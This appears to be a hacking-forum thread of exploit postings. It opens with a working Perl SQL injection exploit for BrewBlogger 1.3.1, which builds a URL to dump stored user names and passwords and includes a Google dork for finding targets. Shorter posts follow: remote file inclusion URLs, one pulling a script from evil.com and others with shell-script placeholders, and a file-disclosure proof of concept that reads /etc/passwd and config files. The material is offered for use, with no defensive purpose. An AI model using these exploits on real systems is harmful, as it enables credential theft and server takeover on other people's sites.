# BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
# Since each user entry contains an auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users' database by iterating
# through every possible ID number.
#
#Vulnerable Code (truncated):
#
# $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
# $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
# $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
# This script will produce a URL which will reveal the user name and password for
# the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
# the first user). The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:".
#
#Usage:
# ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
# intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
###########################################################################################
print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
# #
# Discovered and coded by: Craig Heffner #
###########################################
';
if(!$ARGV[0] || $ARGV[0] eq "-h"){
print "\nUsage: /brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
exit;
}
if(!$ARGV[1]){
$id = 2;
} else {
$id = $ARGV[1];
}
# Build a UNION SELECT with 210 columns to match the 'brewing' table; user_name and
# password are placed in the 8th and 9th positions, which printLog.php renders as
# the "Method:" and "Cost:" fields.
$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$string = "";
$a = 1;
while($a < 211){
    if($a == 8){
        $string .= "user_name,";
    } elsif($a == 9){
        $string .= "password,";
    } elsif($a == 210){
        $string .= "1";
    } else {
        $string .= "1,";
    }
    $a++;
}
print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;
Black_hat_cr(HCE)
IPB bugs from A to Z
Code:
http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=invision&Search=Search
Black_hat_cr(HCE)
phpbb bugs from A to Z
Code:
http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=phpbb&Search=Search
Black_hat_cr(HCE)
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
Code:
Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit:
http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&
Black_hat_cr(HCE)
CMS 4.0 Multiple Remote File Include Vulnerabilities
Code:
http://www.example.com/[path]/index.php?DIR_PLUGINS=[shell_script]
http://www.example.com/[path]/install.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
http://www.example.com/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]
Black_hat_cr(HCE)
com_flyspray Mambo Com <= 1.0.1 Remote File Disclosure Vulnerability
Code:
************************************************************
Component name: com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
************************************************************
Author: Dr Max Virus
Location: Egypt
************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem: The 'file' variable is not sanitized, so you can read any file on the server,
including the config file.
************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
************************************************************
Black_hat_cr(HCE)
com_loudmouth Mambo Component <= 4.0j Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulnerability
download : http://mamboxchange.com/frs/download mouth-4.0j.zip
bug found in file abbc.class.php :
include($GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');
http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[attacker]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all
#batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
Black_hat_cr(HCE)